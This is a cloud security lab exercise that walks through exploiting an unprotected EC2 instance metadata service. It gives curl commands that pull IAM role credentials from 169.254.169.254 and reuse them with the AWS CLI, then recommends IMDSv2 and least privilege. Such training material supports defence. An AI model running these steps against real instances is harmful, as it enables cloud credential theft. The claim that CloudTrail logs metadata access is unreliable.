Exercise 8: Cloud Instance Metadata Service Attack

Objective:

Understand the vulnerabilities in cloud instance metadata services and how attackers can exploit them to access sensitive information, including IAM role credentials. Learn how to secure metadata services to prevent credential leaks.

Scenario:

You are conducting a security assessment of an EC2 instance used by a company. During your testing, you find that the instance metadata service (IMDS) is misconfigured, allowing unrestricted access. Your goal is to demonstrate how attackers can exploit this to retrieve sensitive metadata, including IAM role credentials, and provide recommendations to secure the metadata service.

Lab Setup:

Prerequisites:

1. AWS account (free-tier works for this lab).
2. Installed tools:
   • curl (pre-installed on most Linux systems).
   • Python or Bash for scripting.

Steps to Set Up the Lab:

Launch a Vulnerable EC2 Instance:

Log in to the AWS Management Console.

Navigate to EC2 > Launch Instance:

Use a public AMI, such as Amazon Linux 2.

Assign an IAM role with excessive permissions (e.g., AdministratorAccess).

In the Advanced Details section, ensure that IMDSv2 is not enforced (default is IMDSv1).

Verify Instance Metadata Service (IMDS) Accessibility:

Connect to the EC2 instance via SSH:

ssh -i <key-file>.pem ec2-user@<instance-public-ip>

Use curl to access the metadata service:

curl http://169.254.169.254/latest/meta-data/

Verify that the metadata service responds with a list of available metadata categories (e.g., IAM credentials, public keys).

Exercise: Exploiting the Metadata Service

Objective:

Simulate an attacker retrieving sensitive information, including IAM credentials, from the metadata service.

Retrieve Metadata:

Access the metadata service to enumerate available categories:

curl http://169.254.169.254/latest/meta-data/

Examples of metadata categories:

iam/

public-ipv4

instance-id

Retrieve IAM Role Credentials:

Query the IAM credentials endpoint:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

Note the IAM role name and retrieve its credentials:

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

The response includes:

Access Key ID

Secret Access Key

Session Token

Demonstrate Credential Abuse:

Configure the AWS CLI with the retrieved credentials:

aws configure

Enter the Access Key, Secret Key, and Token.

Use the credentials to list all S3 buckets:bashCopyEditaws s3 ls

Tools Required:

1. AWS EC2: For launching the vulnerable instance.
2. curl: For querying the metadata service.
3. Python/Bash: For automating metadata enumeration.
4. aws-cli: For abusing retrieved IAM credentials.

Deliverables:

1. Exploit Report:
   • Evidence of retrieving metadata and IAM credentials.
   • Screenshots showing unauthorized access to AWS resources using the credentials.
2. Recommendations for Securing Metadata Services:
   • Detailed strategies to harden IMDS and IAM configurations.

Solution:

Identified Vulnerabilities:

IMDSv1 Accessibility: Metadata was accessible without authentication or session tokens.

Excessive IAM Permissions: The assigned role had permissions that could be abused by attackers.

Consequences:

Credential Theft: Attackers can retrieve and misuse IAM role credentials to access AWS resources.

Data Breach: Sensitive resources like S3 buckets or databases could be accessed.

Service Disruption: Attackers can modify or delete resources using the stolen credentials.

Prevention Techniques:

Enforce IMDSv2:

Configure the EC2 instance to use IMDSv2 only:

aws ec2 modify-instance-metadata-options --instance-id <instance-id> --http-tokens required 

This requires all metadata queries to include a valid session token.

Restrict IAM Role Permissions:

Follow the principle of least privilege to minimize permissions granted to IAM roles.

Regularly audit IAM roles using AWS IAM Access Analyzer.

Network Isolation:

Use security groups and network ACLs to restrict access to the metadata service.

Monitor Metadata Access:

Enable AWS CloudTrail to log and monitor metadata service access attempts.

Use Temporary Credentials:

Rotate IAM credentials regularly and use temporary credentials for short-term tasks.

Conclusion:

This exercise highlights the risks of exposing the instance metadata service to unrestricted access. By enforcing IMDSv2, minimizing IAM permissions, and implementing network isolation, organizations can protect sensitive metadata and prevent credential theft.